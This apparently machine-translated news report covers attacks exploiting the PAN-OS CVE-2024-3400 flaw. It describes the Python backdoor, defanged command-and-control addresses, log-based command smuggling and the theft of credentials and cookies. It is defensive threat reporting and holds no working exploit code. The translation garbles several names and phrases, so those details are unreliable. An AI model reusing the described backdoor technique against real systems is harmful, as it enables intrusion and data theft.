Hackers deploy Python backdoor in Palo Alto zero-day attack

ReportApril 13, 2024Editorial Department

Threat actors have been exploiting a newly revealed zero-day vulnerability in Palo Alto Networks PAN-OS software that dates back to March 26, 2024, nearly three weeks after it was revealed yesterday.

The cyber security company’s Unit 42 division is tracking activity under the name Operation Midnight Etchattributing it to the work of a single threat actor of unknown origin.

This security vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), is a command injection flaw that allows an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

It is worth noting that this issue only applies to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewall settings with GlobalProtect gateway and device telemetry enabled.

MidnightEclipse operations need to exploit this flaw to create a cron job that executes every minute to obtain commands hosted on an external server (“172.233.228[.]93/policy” or “172.233.228[.]93/patch”), and then execute it using bash shell.

The attackers allegedly manually managed the access control list (ACL) of the command and control (C2) server to ensure that it could only be accessed from the devices communicating with it.

While the exact nature of the command is unclear, the URL is suspected to be the delivery vehicle for a Python-based backdoor on the Volexity firewall that was discovered in the wild exploiting CVE-2024-3400 on April 10, 2024 – in progress with UPSTYLE Tracked and hosted on a different server (“144.172.79[.]92” and “nhdata.s3-us-west-2.amazonaws[.]com”).

The Python file is designed to write and launch another Python script (“system.pth”), which then decodes and runs an embedded backdoor component responsible for executing the threat actor’s commands in a file named “sslvpn_ngx_error.log”. The results of the operation are written to a separate file named “bootstrap.min.css”.

The most interesting aspect of the attack chain is that the files used to extract the commands and write the results are legitimate files associated with the firewall –

• /var/log/pan/sslvpn_ngx_error.log
• /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css

As for how to write commands to web server error logs, threat actors forge specially crafted network requests and send them to non-existent web pages that contain specific patterns. The backdoor then parses the log archive and searches for lines matching the same regular expression (“img\[([a-zA-Z0-9+/=]+)\]”) Decode and execute the commands inside.

“The script will then create another thread and run a function called ‘resume,'” Unit 42 said. “The restore function obtains the original content and original access and modification times of the bootstrap.min.css file, sleeps for 15 seconds and writes the original content back to the file, and sets the access and modification times to their original values.”

The main goal seems to be to avoid leaving a trace of the command output, so the results need to be leaked within 15 seconds before the archive is overwritten.

In its own analysis, Volexity said it observed threat actors remotely leveraging firewalls to create reverse shells, download additional tools, gain access to internal networks and ultimately exfiltrate data. The exact scale of the event is unclear. The company has assigned the rival the nickname UTA0218.

“The intelligence techniques and speed employed by the attackers demonstrate that the threat actors are highly capable and have a clear playbook on how to gain access to further their goals,” the US cybersecurity firm said.

“UTA0218’s initial goal was to obtain domain backup DPAPI keys and locate Active Directory credentials by obtaining the NTDS.DIT ​​file. They further targeted user workstations to steal stored cookies and login data as well as user DPAPI key. ”

Organizations are advised to look for signs of internal lateral movement within their Palo Alto Networks GlobalProtect firewall appliances.

The development also prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the flaw to its Known Exploitable Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by April 19 to mitigate potential threats. . Palo Alto Networks expects to release a fix for this flaw by April 14.

“Targeting edge devices remains a popular attack vector for capable threat actors who have the time and resources to invest in researching new vulnerabilities,” Volexity said.

“Based on the resources required to develop and exploit a vulnerability of this nature, the types of victims this actor targeted, and the demonstrated functionality to install a Python backdoor and gain further access to victims, UTA0218 is likely to be a state-sponsored network of threat actors.”